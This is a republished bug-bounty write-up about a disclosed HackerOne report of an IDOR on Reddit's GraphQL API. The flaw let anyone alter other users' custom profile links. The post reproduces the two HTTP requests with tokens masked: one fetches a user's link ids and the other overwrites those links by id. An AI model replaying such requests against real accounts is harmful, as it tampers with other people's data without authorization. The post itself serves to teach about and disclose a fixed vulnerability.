2022-12-24 00:36:22 Author: infosecwriteups.com(查看原文) 阅读量:27 收藏
Modifying any users custom profile links
IDOR, Insecure Direct Object Refference is a broad yet potentially a critical vulnerability. This type of vulnerability occurs when an application does not properly validate user input. An attacker can use this vulnerability to access unauthorized resources or perform unauthorized actions.
In this write-up i’ll be explaining a disclosured report on HackerOne reported by the user criptex The report can be found here
Reddit users can add custom links or social media profile links to their reddit profile and redirect other users.
The custom links on the profile could be changed with the following vulnerable request.
POST / HTTP/2
Host: gql.reddit.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20000101 Firefox/101.0
Accept: */*
Accept-Language: es-AR,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 173
X-Reddit-Loid: * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
X-Reddit-Session: * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
X-Reddit-Compression: 1
Origin: https://www.reddit.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Authorization: Bearer * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Referer: https://www.reddit.com/
Te: trailers{"id":"c558e604581f","variables":{"input":{"socialLinks":[{"outboundUrl":"https://www.hackerone.com","title":"hacker","type":"CUSTOM","id":"* * * * * * * * * * * * * * * * * * * * * * * * * * * * * *"}]}}}
He was able to change any reddit users profile links with changing the latter id parameter in the request. He used the following request to get this custom link ids on other users profiles.
POST / HTTP/2
Host: gql.reddit.com
Content-Length: 62
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"
X-Reddit-Loid: * * ** * * * * * * * * * * ** * * * * * * * * * * * * * * * * *
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/531.36
X-Reddit-Compression: 1
X-Reddit-Session: * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://www.reddit.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.reddit.com/
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9,en-US;q=0.8,en;q=0.7,bs;q=0.6,ja;q=0.5{"id":"11a239b07f86","variables":{"username":"*********"}}
As this could have some bad image impact for Reddit users, hacker criptex was rewarded a well deserved 5000$ bounty.
From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 GitHub Repos and tools, and 1 job alert for FREE!
如有侵权请联系:admin#unsafe.sh